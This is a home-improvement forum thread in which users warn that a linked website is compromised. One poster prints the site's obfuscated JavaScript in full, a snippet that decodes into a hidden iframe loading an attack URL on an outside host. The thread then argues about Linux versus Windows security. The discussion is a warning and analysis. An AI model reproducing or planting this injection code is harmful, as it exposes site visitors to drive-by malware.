I see we now pay a weee surcharge on fluorescent tubes but does it subsidise this sort of thing:
AJH
The web-site mentioned in the OP may be compromised, at any rate when I opened it with IE6 on Win XP Pro my laptop shut down and when restarted Symantec AV reported
Andrew,
*BE* *AWARE*This may be a false positive, but each time I try to access the link that you give it is blocked by Norton Internet Security in both Outlook Explorer and Firefox - giving the message that my computer was being 'attacked by' the HTTP Malicious Toolkit Variant Activity 2.
See this link for brief details:
Cash
Error Correction:
*Outlook* Explorer should have been *Internet* Explorer.Cash
reported
Owain
reported
And?
Thanks for the warning Cash, It wouldn't have flagged up on this OS. OTOH I came across them from a flyer posted through my door and have no reason to believe the site is pernicious.
AJH
It contains an obfuscated section of Javascript
var kPvOkYUlTEBvLmAPjYUP = "nd60nd105nd102nd114nd97nd109nd101nd32nd119nd105nd100nd116nd104nd61nd34nd52nd56nd48nd34nd32nd104nd101nd105nd103nd104nd116nd61nd34nd54nd48nd34nd32nd115nd114nd99nd61nd34nd104nd116nd116nd112nd58nd47nd47nd104nd105nd116nd45nd115nd101nd110nd100nd101nd114nd115nd46nd99nd110nd47nd102nd105nd110nd100nd47nd105nd110nd46nd99nd103nd105nd63nd49nd50nd34nd32nd115nd116nd121nd108nd101nd61nd34nd98nd111nd114nd100nd101nd114nd58nd48nd112nd120nd59nd32nd112nd111nd115nd105nd116nd105nd111nd110nd58nd114nd101nd108nd97nd116nd105nd118nd101nd59nd32nd116nd111nd112nd58nd48nd112nd120nd59nd32nd108nd101nd102nd116nd58nd45nd53nd48nd48nd112nd120nd59nd32nd111nd112nd97nd99nd105nd116nd121nd58nd48nd59nd32nd102nd105nd108nd116nd101nd114nd58nd112nd114nd111nd103nd105nd100nd58nd68nd88nd73nd109nd97nd103nd101nd84nd114nd97nd110nd115nd102nd111nd114nd109nd46nd77nd105nd99nd114nd111nd115nd111nd102nd116nd46nd65nd108nd112nd104nd97nd40nd111nd112nd97nd99nd105nd116nd121nd61nd48nd41nd59nd32nd45nd109nd111nd122nd45nd111nd112nd97nd99nd105n d116nd121nd58nd48nd34nd62nd60nd47nd105nd102nd114nd97nd109nd101nd62"; var LQweQmnfGaTqpPFaoZLH = kPvOkYUlTEBvLmAPjYUP.split("nd"); var dNCoADEkcYAnpwSFjFkp = ""; for (var fDfVTkvHKHOnVRcVUgGw = 1; fDfVTkvHKHOnVRcVUgGw < LQweQmnfGaTqpPFaoZLH.length; fDfVTkvHKHOnVRcVUgGw++) { dNCoADEkcYAnpwSFjFkp += String.fromCharCode(LQweQmnfGaTqpPFaoZLH[fDfVTkvHKHOnVRcVUgGw]); } document.write(dNCoADEkcYAnpwSFjFkp)
which inserts the following html (without the x's) into the document
The frame content seems to be the reported attack site, according to Google.
reported
He is another of those linux people that thinks he is safe, wrongly!
I don't know what you tried to post but avast doesn't like it. Avast thinks its an html Iframe attack.
Slight exaggeration from avast.
My post included details of how the original site uses obfuscated javascript to insert an iframe into the webpage, the target of the iframe is an attack site, but I did alter the url.
Then he should read this from the Symantec page.
"Rootkits first appeared on the UNIX operating system. Administrator/Superuser accounts on UNIX systems are called root. "
I thought it was that.
Avast doesn't know if the site is bad but it does understand that something devious is being attempted and blocks it.
Do these iframe attacks work on the linux version of FF if they have the java script enabled? I know its an old security hole that shouldn't work on IE8 but avast doesn't like it still.
>
In many cases a dodgy site was not actually intending to be harmful. However it ends up that way either as a result of getting compromised itself, or by hosting ads from an ad server that is carrying malicious content.
Its quite common amongst linux users to think they are invulnerable.. so they don't take much in the way of security precautions. This is made worse because the majority of them are unable to tell if they have been rooted as they have no tools to tell them and they don't understand what should be running on their machine in the first place.
They will counter this argument by saying how many exploits exist for windows.. this being the fools argument as we are not talking about how secure windows is.
I have sent a report to their webmaster and, just in case, their web host. I will be interesting to see what if anything that achieves.
Indeed you are correct. I am a Linux user, but I consider it important to have up-to-date firewalls, virus checkers on both incoming and outgoing mail, and I check the logs daily to see if I need to do anything more. In fact I go further and have a firewall on the Internet connection machine, and then individual firewalls on each client. The outgoing virus check is to protect you Windows users from anything that might infect me.
It is true however, that for a layman, Linux is less often targeted, and thus you might get away with it for longer. I also think that the average Linux user could rebuild his system if it got compromised, but the average Windows user can't.
R. (FBCS CITP)
The "average" linux user, if they built the system themselves, would be experienced enough to reinstall it. However, it is a great memory feat to remember all the kludges and text file fixes to get some bits of hardware configured correctly again. The words 'pulseaudio' and 'WPA supplicant' are not in my good books at the moment.
If a user has had their machine built by someone else, then they just have to upgrade their own human existance to sysadmin - or find something or someone in PC World :-(
It's crazy running heavy weight do-everything operating systems in the wilds of consumer land. Users shouldn't need to deal with file objects ever. We should be running with 'internet appliances' - thin clients and remote support, applications & maintenance. Business machines should have stayed in the business world IMO. And that includes Linux...
Something nicely solidstate, plugged into a monitor / flat panel TV, with just a web browser and broadband connection - wouldn't have been so hard. The games console sucessors to the 80's 'home computer' are almost there...
RISC OS isn't targeted at all. ;-)
HomeOwnersHub website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.